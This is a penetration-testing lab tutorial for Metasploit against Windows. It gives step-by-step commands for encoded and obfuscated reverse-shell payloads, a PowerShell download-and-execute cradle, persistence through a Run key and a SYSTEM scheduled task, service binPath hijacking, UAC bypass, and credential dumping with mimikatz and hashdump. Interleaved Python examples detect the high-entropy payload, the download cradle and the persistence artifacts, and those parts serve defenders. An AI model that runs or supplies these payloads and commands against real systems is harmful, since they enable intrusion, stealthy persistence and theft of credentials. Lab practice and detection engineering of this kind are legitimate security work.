20. Metasploit Lab Environment

To implement these techniques in a lab environment, let's create a setup where we can safely test bypassing AV/EDR, fileless execution, persistence, and privilege escalation. Here’s a detailed plan:


Lab Environment Setup

1. Required Tools

  • Attacker Machine: Kali Linux or Parrot OS with Metasploit installed.
  • Target Machine: Windows 10 or Windows Server 2019.
    • Initially disable real-time protection to simulate an AV/EDR that has already been bypassed.
    • Use a VM snapshot for safe restoration.

2. Network Configuration

  • Use an isolated NAT or Host-Only network in your hypervisor (VirtualBox, VMware).
  • Configure IPs:
    • Attacker: 192.168.1.10
    • Target: 192.168.1.20

Bypassing AV/EDR

Let’s create a stealthy reverse shell payload and execute it on the target.

Steps:

  1. Generate an Encoded Payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_payload.exe
    
  2. Obfuscate Using PEzor:

    • Install and run:

      ./PEzor.sh encoded_payload.exe
      
    • Output: encoded_payload.exe_obfuscated.

    • Deliver the Payload:

      • Host it via HTTP:

        python3 -m http.server 8080
        
      • Download on the target:

        curl http://192.168.1.10:8080/encoded_payload.exe_obfuscated -o payload.exe
      
  3. Execute on the Target:

    payload.exe
    
  4. Set Up Listener on Attacker:

    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.10
    set LPORT 4444
    exploit
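
The encoding step above is also what gives the blue team its first handle: an encoder such as shikata_ga_nai wraps the payload body in a decoder stub, so the encoded region looks close to uniformly random, and a high-entropy section is a classic heuristic for packed or encoded executables. The following is an added example (not code from the page or from any of the tools it names) of that heuristic: it computes Shannon entropy per section and flags anything above a threshold. The section bytes are constructed stand-ins, and the 7.0 bits/byte threshold is an assumed tuning value rather than anything the page states.

```python
import math
import random
from collections import Counter

# Assumed tuning value: well-formed native code usually sits around 5-6.5
# bits/byte, encoded or compressed regions approach 8. Not from the page.
ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of `data` in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_report(sections: dict) -> dict:
    """Map each section name to (entropy, suspicious).

    Sections are passed as raw bytes so the same check works on a carved
    region, a PE section, or a whole file.
    """
    report = {}
    for name, body in sections.items():
        h = shannon_entropy(body)
        report[name] = (round(h, 3), h > ENTROPY_THRESHOLD)
    return report


def build_constructed_samples() -> dict:
    """Constructed stand-ins for two sections (not bytes from any real payload).

    `.text` imitates readable, low-variety content; `.data` is a seeded
    pseudo-random blob that imitates an encoded body. The fixed seed keeps the
    result reproducible.
    """
    rng = random.Random(1234)
    plain = b"MOV EAX, [EBP+8]; CALL GetProcAddress; RET\n" * 64
    encoded = bytes(rng.getrandbits(8) for _ in range(4096))
    return {".text": plain, ".data": encoded}


if __name__ == "__main__":
    for name, (entropy, suspicious) in section_report(build_constructed_samples()).items():
        print(f"{name:6} entropy={entropy:.3f} {'SUSPICIOUS' if suspicious else 'ok'}")
```

Entropy alone is a triage signal, not a verdict: compressed resources and legitimately packed installers also score high, which is why in practice it is combined with behavioural telemetry such as the outbound connection to port 4444 that the listener step expects.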
    

Fileless Execution

Run the payload directly in memory.

Steps:

  1. Generate a PowerShell Payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f ps1 -o payload.ps1
    
  2. Host the Script:

    python3 -m http.server 8080
    
  3. Execute with PowerShell:

    IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.10:8080/payload.ps1')
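
From the defender's side, the download cradle above is one of the most reliably detectable parts of this workflow, because PowerShell script block logging (Event ID 4104) records the decoded command text regardless of how it was launched. The following is an added example, not code from the page, of a detection that scores script blocks by the two halves of the cradle: a network fetch and an in-memory invoke. The event records are constructed and reduced to the fields the check needs; the field names and the medium/high scoring are assumptions of this example.

```python
import re

# Constructed events shaped like PowerShell script block logging (Event ID 4104),
# reduced to the fields used here. Not records from any real host.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Host": "WIN10-LAB",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object Name"},
    {"EventID": 4104, "Host": "WIN10-LAB",
     "ScriptBlockText": "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv"},
    {"EventID": 4104, "Host": "WIN10-LAB",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.10:8080/payload.ps1')"},
    {"EventID": 4104, "Host": "WIN10-LAB",  # same cradle, different casing
     "ScriptBlockText": "iex (new-object net.webclient).downloadstring('http://192.168.1.10:8080/payload.ps1')"},
]

# PowerShell is case-insensitive, so every pattern is too.
CRADLE_INVOKE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
CRADLE_FETCH = re.compile(
    r"(net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
    r"|invoke-restmethod|\birm\b|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
URL = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
SEVERITY = {0: "none", 1: "medium", 2: "high"}


def classify_script_block(text: str) -> dict:
    """Score one script block.

    A network fetch on its own is worth a look (medium); a fetch handed to
    IEX/Invoke-Expression is the in-memory cradle itself (high).
    """
    fetch = bool(CRADLE_FETCH.search(text))
    invoke = bool(CRADLE_INVOKE.search(text))
    score = (1 if fetch else 0) + (1 if fetch and invoke else 0)
    return {"severity": SEVERITY[score], "fetch": fetch,
            "invoke": invoke, "urls": URL.findall(text)}


def scan_events(events: list) -> list:
    """Return only 4104 events worth alerting on, annotated with the verdict."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        verdict = classify_script_block(ev["ScriptBlockText"])
        if verdict["severity"] != "none":
            findings.append({**ev, **verdict})
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['Host']}: {f['ScriptBlockText'][:70]} urls={f['urls']}")
```

The extracted URL is the pivot for the rest of the investigation: in this lab it points straight at the attacker host and port chosen in the network configuration, which is also what a proxy or DNS log would show.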
    

Persistence

Use Meterpreter to maintain access.

Steps:

  1. Meterpreter Persistence Script:

    run persistence -U -i 10 -p 4444 -r 192.168.1.10
    
  2. Registry Key:

    • Create persistence manually:

      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Updater" /t REG_SZ /d "C:\path\to\payload.exe"
      
  3. Scheduled Task:

    schtasks /create /tn "Updater" /tr "C:\path\to\payload.exe" /sc onlogon /ru SYSTEM
    

Privilege Escalation

Use Metasploit or manual techniques.

Steps:

  1. Exploit Suggestion: Run the Local Exploit Suggester:

    use post/multi/recon/local_exploit_suggester
    set SESSION 1
    run
    
  2. Exploit Services: If a service has weak permissions:

    sc config <service-name> binPath= "C:\path\to\payload.exe"
    sc start <service-name>
    
  3. Bypass UAC:

    use exploit/windows/local/bypassuac
    set SESSION 1
    run
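
Each of the three persistence mechanisms above (Run key, logon scheduled task) and the service binPath rewrite from the privilege escalation steps leaves a distinct, loggable artifact: a Sysmon Event ID 13 registry value set on the Run key or on a service's ImagePath, and a Security Event ID 4698 when a scheduled task is created. The following is an added example, not code from the page or from Metasploit, of a detection pass over such events that serves both sections. The events are constructed and trimmed to the fields the checks use; the field names, the "trusted directory" prefixes, and the verdict shapes are assumptions of this example, and the trusted-directory flag is a triage hint, since legitimate autoruns commonly live outside those paths too.

```python
import re
import xml.etree.ElementTree as ET

# Constructed events modelled on Sysmon Event ID 13 (RegistryEvent: value set)
# and Security Event ID 4698 (scheduled task created). Not from a real host.
SAMPLE_EVENTS = [
    {   # Run-key autorun, the artifact the `reg add` step leaves behind
        "Source": "Sysmon", "EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
        "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
        "Details": "C:\\path\\to\\payload.exe",
    },
    {   # A vendor autorun in Program Files, to show the triage field
        "Source": "Sysmon", "EventID": 13, "Image": "C:\\Program Files\\ExampleVendor\\Setup.exe",
        "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ExampleVendor",
        "Details": "\"C:\\Program Files\\ExampleVendor\\Agent.exe\" /background",
    },
    {   # Service binary rewritten, the artifact `sc config ... binPath=` leaves
        "Source": "Sysmon", "EventID": 13, "Image": "C:\\Windows\\System32\\services.exe",
        "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\ExampleSvc\\ImagePath",
        "Details": "C:\\path\\to\\payload.exe",
    },
    {   # Unrelated registry write that must not alert
        "Source": "Sysmon", "EventID": 13, "Image": "C:\\Windows\\explorer.exe",
        "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden",
        "Details": "DWORD (0x00000001)",
    },
    {   # Logon-triggered SYSTEM task, as `schtasks /sc onlogon /ru SYSTEM` creates
        "Source": "Security", "EventID": 4698, "TaskName": "\\Updater",
        "TaskContent": (
            '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            "<Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>"
            "<Principals><Principal><UserId>S-1-5-18</UserId></Principal></Principals>"
            "<Actions><Exec><Command>C:\\path\\to\\payload.exe</Command></Exec></Actions></Task>"
        ),
    },
]

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\[^\\]+$", re.IGNORECASE)
SERVICE_IMAGEPATH = re.compile(r"\\System\\(CurrentControlSet|ControlSet\d{3})\\Services\\[^\\]+\\ImagePath$", re.IGNORECASE)
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")  # assumed
SYSTEM_SID = "S-1-5-18"


def executable_path(command: str) -> str:
    """Pull the executable out of a command line: a quoted path, else the first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def in_trusted_dir(path: str) -> bool:
    return path.lower().startswith(TRUSTED_PREFIXES)


def check_registry_event(ev: dict):
    """Flag value writes to Run/RunOnce keys and to a service's ImagePath."""
    target = ev["TargetObject"]
    if RUN_KEY.search(target):
        kind = "autorun_registry"
    elif SERVICE_IMAGEPATH.search(target):
        kind = "service_imagepath"
    else:
        return None
    exe = executable_path(ev["Details"])
    return {"kind": kind, "target": target, "executable": exe,
            "writer": ev["Image"], "trusted_dir": in_trusted_dir(exe)}


def check_task_event(ev: dict):
    """Parse the task XML: what runs, on which trigger, and as whom."""
    root = ET.fromstring(ev["TaskContent"])
    cmd = root.find(".//{*}Command")          # {*} matches any namespace
    if cmd is None:
        return None
    exe = executable_path(cmd.text or "")
    user = root.find(".//{*}UserId")
    return {"kind": "scheduled_task", "target": ev["TaskName"], "executable": exe,
            "logon_trigger": root.find(".//{*}LogonTrigger") is not None,
            "runs_as_system": user is not None and (user.text or "").upper() == SYSTEM_SID,
            "trusted_dir": in_trusted_dir(exe)}


def scan(events: list) -> list:
    findings = []
    for ev in events:
        if ev["Source"] == "Sysmon" and ev["EventID"] == 13:
            f = check_registry_event(ev)
        elif ev["Source"] == "Security" and ev["EventID"] == 4698:
            f = check_task_event(ev)
        else:
            f = None
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['kind']:18} {f['executable']:45} trusted_dir={f['trusted_dir']}")
```

Run against the lab after the persistence and service steps, the two payload.exe findings are the ones to expect; the "Validate Persistence" reboot in the testing workflow is also the moment the logon trigger and Run key fire, so the reconnect on port 4444 should line up with a process-creation event for the flagged executable.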
    

Testing Workflow

1. Deploy the Payload

Choose a method:

  • Dropper (encoded EXE).
  • Fileless (PowerShell loader).

2. Monitor Results

  • On the attacker machine:

    sessions -i 1
    
    • Dump credentials:

      run post/windows/gather/credentials/mimikatz
      
    • Dump password hashes:

      hashdump
      

3. Validate Persistence

  • Reboot the target and verify Meterpreter reconnects.

4. Escalate Privileges

Use suggested exploits or weak service permissions.